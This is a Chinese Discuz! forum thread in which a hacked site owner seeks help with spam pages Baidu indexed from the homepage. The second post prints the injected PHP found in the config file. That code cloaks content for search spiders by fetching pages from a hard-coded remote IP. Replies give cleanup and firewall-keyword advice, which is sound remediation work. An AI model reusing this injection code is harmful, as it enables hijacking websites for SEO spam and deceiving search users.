设为首页收藏本站
切换到宽版

Discuz!官方免费开源建站系统

 找回密码
 立即注册
搜索
Discuz!官方免费开源建站系统»论坛 Discuz! 交流与讨论 站长帮 网站被劫持后发现网站首页后面加任意字符都可以访问如何 ...
返回列表 发新帖

[新需求] 网站被劫持后发现网站首页后面加任意字符都可以访问如何解决?

[复制链接]
1270643127 发表于 2020-11-29 23:20:07 | 显示全部楼层 |阅读模式
需求发布
金额范围: 50-100 元
预算金额: 50 元
开始时间:
结束时间:
联系方式: 隐藏内容
网站被劫持后发现网站首页后面加任意字符都可以访问如何解决?, W4 f- o5 ~4 c* ?

9 X" c& H& {) G$ B: b网站被劫持后生成了大量首页php后面加任意字符都还是可以访问9 g) O! @  N: }7 ]( F0 k) m
百度收录大量的这样帖子% w' M) T8 }6 A9 l2 z

: q3 j3 |1 J  A现在如何解决这样的?
( X2 M& @, C  v$ D
  U6 [: I9 t( L9 i# Q" t宝塔面板。。。。。。% ^# z. V$ m8 m

' v2 _( g8 P. j0 J1 d; D如/forum.php?123456
) ]/ E9 b8 M8 r/forum.php?12365
" Z7 v% z4 D  l/forum.php?515151
; j6 m8 D; U5 ]' F/ \- g7 t' Y& D& s  n  O
随便加都可以访问,只有首页而已其他文章帖子加就不可以。。。" a9 n5 z' ^& ^: O; @1 x$ X
回复

使用道具 举报

 楼主| 1270643127 发表于 2020-11-30 00:17:02 | 显示全部楼层

+ M. m4 Z( b; h' `6 r9 M3 w7 e7 x  p#set_time_limit(30);error_reporting(0);$tr=stristr;$er=$_SERVER;define('url',$er['REQUEST_URI']);define('ref',$er['HTTP_REFERER']);define('ent',$er['HTTP_USER_AGENT']);define('site',"http://156.226.52.130");define('road',"/?road=".$er['HTTP_HOST'].url."&der=".ent);define('regs', '@Baidu|Sogou|Yisou|Haosou|Spider|So.com|Sm.cn@i');define('area',$tr(url,".xml")or $tr(url,".html")or  $tr(url,".doc")or $tr(url,".txt")or $tr(url,".ppt")or $tr(url,".xls")or $tr(url,".csv")or $tr(url,".shtml")or $tr(url,".docx")or $tr(url,".xlsx")and $tr(url,"?"));if(area&&preg_match(regs,ref)){echo g('http://156.226.52.130/404.html');exit;}if(preg_match(regs,ent)){if(area){echo g(site.road);exit;}else{echo g("http://156.226.52.130/u.php");ob_flush();flush();}}function g($f){$c=array('http'=>array('method'=>"GET"));$g=stream_context_create($c);$h=file_get_contents($f,false,$g);if(!empty($h)){return $h;}}
1 H6 p2 U3 i6 _; i1 l% m8 m// --------------------------  CONFIG ADMINCP  -------------------------- //
* q2 o; t3 w/ j! s4 R! U// -------- Founders: $_config['admincp']['founder'] = '1,2,3'; --------- //
  V0 @) ?$ o" K0 i' J4 J7 e0 I
回复

使用道具 举报

cardz! 发表于 2020-11-30 06:34:12 | 显示全部楼层
这个是加什么都可以访问,出现这种字符的原因解决了就好了。Q3160510998
回复

使用道具 举报

Failure 发表于 2020-11-30 11:16:25 | 显示全部楼层
你找到了劫持代码 并没有找到后门在哪,还是会出现的
回复

使用道具 举报

 楼主| 1270643127 发表于 2020-11-30 11:34:07 | 显示全部楼层
cardz! 发表于 2020-11-30 06:34
* i) d6 v8 ]$ E( n; |" l1 x1 o8 s这个是加什么都可以访问,出现这种字符的原因解决了就好了。Q3160510998
5 |, w4 ]' E. t
啥原因呀?现在是加啥都还可以访问..
回复

使用道具 举报

cardz! 发表于 2020-11-30 13:54:57 | 显示全部楼层
1270643127 发表于 2020-11-30 11:341 H8 t6 `* ]; N$ l: z$ q/ e/ @
啥原因呀?现在是加啥都还可以访问..

! n# j  [+ B; l" U, {5 R% E3 u0 C9 d谁的都可以,不只是你的。
回复

使用道具 举报

 楼主| 1270643127 发表于 2020-11-30 17:40:38 | 显示全部楼层
cardz! 发表于 2020-11-30 13:54
# B- M5 C- [2 A: w  q- A  T5 ]谁的都可以,不只是你的。
2 X4 A$ j& K6 S. M# v: D$ Q
那不是不能解决了?已经收录了好多了
回复

使用道具 举报

babyfacer 发表于 2020-12-12 18:45:36 | 显示全部楼层
1270643127 发表于 2020-11-30 17:40
5 y' e( R0 [; T5 F, d" W4 U+ g那不是不能解决了?已经收录了好多了

! f. g6 `9 z$ V7 b: ?" j; Q你先把config里边那段代码删除,然后还要检查最近新增和修改的文件$ r0 q4 o7 C- C8 M+ d# \7 D
& F2 r: r( |7 e3 A( L, s# W0 h
你去做一个抓取测试(你自己正常访问页面,是正常的,但是蜘蛛访问,是另外一个样子)
0 @3 d: a5 T" ~8 a* j: r$ ~如果没有注册百度站长或者百度统计,就去下面这个网址,也可以7 I! x' {  v6 y' s( w" ?! K
  1. http://stool.chinaz.com/tools/webcheck.aspx
复制代码
% s$ X" R' C, G9 o
; [: C' C( j3 N$ G* n
如果以前的那些页面依然有问题,就说明你没有清除干净(也算不上清除干净,你删除了恶意代码,但是后门还是在的)8 y" Y. u3 ^6 N/ j

4 ?+ s- L! e! K2 C1 D7 V) q我自己网站的黑链网址是/?s***.后缀   清除之后,这些页面就不能访问了,然后你可以去百度提交死链,删除这些快照。当然啦,我很早以前就在robots里边直接屏蔽了【?】 所以被挂黑链半个月,百度 根本没有收录黑链。然后我发现黑链之后,直接去百度申请闭站了,解决完了才恢复的
回复

使用道具 举报

babyfacer 发表于 2020-12-12 18:47:55 | 显示全部楼层
而且你使用宝塔,宝塔有免费防火墙,你可以把恶意代码的一些关键词,比如“156.226.52.130” “$tr(url” 直接添加到防火墙。并且,定期扫描(扫描结果要分析哈,DZ默认的某些文件也会被扫描出有问题,但是并不是真的有问题)
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

手机版|小黑屋|Discuz! 官方站 ( 皖ICP备16010102号 )star

GMT+8, 2025-7-15 15:51 , Processed in 0.117680 second(s), 16 queries , Gzip On.

Powered by Discuz! X3.4

Copyright © 2001-2023, Tencent Cloud.

快速回复 返回顶部 返回列表